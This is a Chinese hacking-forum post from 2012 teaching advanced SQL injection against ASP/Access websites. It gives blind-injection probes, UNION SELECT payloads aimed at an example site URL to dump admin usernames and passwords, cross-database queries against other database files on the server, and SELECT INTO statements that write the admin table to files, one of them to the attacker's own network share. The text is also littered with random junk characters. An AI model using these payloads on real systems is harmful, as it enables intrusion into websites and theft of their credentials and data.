找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2181|回复: 0
打印 上一主题 下一主题

Access高级注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:20:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
--------------------------------------------------------------9 b4 C+ N4 o7 y9 N8 g
union查询法
* o; K+ r2 m) {  z首先要说的就是查询办法,一般的查询办法就是( D$ ^4 Y+ F' a3 T
* s3 q) p1 B" }+ N; i& i; I* l) J
程序代码% @4 p; I. T- K% U& s
and 1=(select count(*) from admin where left(id,1)='1')
+ ?" j9 q& {" h% E8 r& y( d5 ]7 L6 k8 ?$ H6 [+ a
这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.0 ~/ R5 w2 O% M: P; _* p5 K# a: q
所以这个时候,union select横空出现.别以为只能在PHP里用哦...  z& a  w7 H: z; v1 Y8 x
譬如你有一个ACCESS点:
# g9 B9 C+ N* I3 m3 P/ R6 I9 A" j. |; n程序代码. ]5 W) b: C; y9 G; z2 Y  V+ c9 V
http://bbs.tian6.com/xiaoyang.asp?coder=1) S8 R5 u- O1 X/ G- ~; d. c5 |
8 \- b0 t+ m6 U; D8 B  i
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),' E  T' _$ }$ o; c
然后我们直接来:2 A) }" _3 p$ @; F$ B
程序代码6 ]" G$ U& d+ w; e- Z
http://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]; K2 ]% [* ^0 I8 _

$ m. d2 @% J" V  ?1 s这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.4 `' t2 [9 \7 y1 F; ~( }, h. K
" y- U; {- _( [& G
! j2 Z0 d: ^: N) {" F% q' q

# N+ j* S1 L8 e* K3 X* V# m+ D; c---------------------------------------------------------------
) D& H6 E& Y5 `* P4 b( CAccess跨库查询
- U9 W& j% `. P4 B' m有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.3 N; P1 _: o" o
跨库的查询语句:: ?1 v6 f' l2 `6 @1 ]0 v
子查询:! ~4 `1 J$ }' E& V3 e! s2 A* g% g* q4 u
程序代码" _% J' Q* k; n7 I: d
and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
5 S8 \2 {  }* `" _
- V5 E4 `5 P$ E0 j- V: m: Munion查询:
+ }# y; p9 O0 q7 M- R  h; j; r程序代码
5 G6 p+ s; X  `' }+ Q2 H! w" Hunion select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1
4 A- Z0 k" V+ ?
" i8 T# R6 N- r4 x7 z) d5 U1 C4 p跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
8 v! x$ z7 i4 Z4 D程序代码& D8 b' Y" M! a( ^
http://www.4ngel.net/article/46.htm # G! n0 }' ^* c# S% J2 T! s
http://hf110.com/Article/hack/rqsl/200502/66.html
# z: u- H7 ~4 W( i( _
+ M; m1 [- z) d) E---------------------------------------------------------------
' \) O2 H& d' _, iAccess注入,导出txt,htm,html
/ T. R2 k( ?# U+ y* K  ]子查询语句:/ o  Y. }  D3 f3 N
程序代码( q' U0 D# X, \3 ?  E0 T& e0 _% \' D
Select * into [test.txt] in 'd:\web\' 'text;' from admin* V& s. R3 i; R- e2 W" R5 \+ [

! |0 L$ z' t' w4 e6 U- H# G这样就把admin表的内容以test类型存进了d:\web里面.$ A* \$ k5 N" f* p
UNION查询:+ Z- ~) z$ ^' X8 s) a3 l( i
程序代码
% R6 f4 a% i% u/ Punion select * into [admin.txt] in 'c:\' 'test;' from admin  b$ K" l+ W! h: B
; [4 N) L5 J/ o" }- s
而且这里也可以保存到本地来:8 S9 [' V" g; ]. L  O" q
程序代码
% w/ n/ l. W2 dSelect * into [test.txt] in '\\yourip\share' 'text;' from admin
; y  o. a: \; M) I4 f6 Z* U/ e/ d: Y
( d4 f7 l) x, G' o* k  ^不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:, M& N( i& i, h/ v  w

& u  x2 v( q: {- W! h# E程序代码) K+ {+ X% ~( |; Y- G. C
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7% s1 d$ }- ~. M+ B7 J5 I

/ r) @8 l3 F, @. t$ d2 B. r5 U因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang  asp.asp之类的文件或者目录来导进文件~还是会很强大的.
! T0 ]7 C1 H* R5 y- j5 N
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表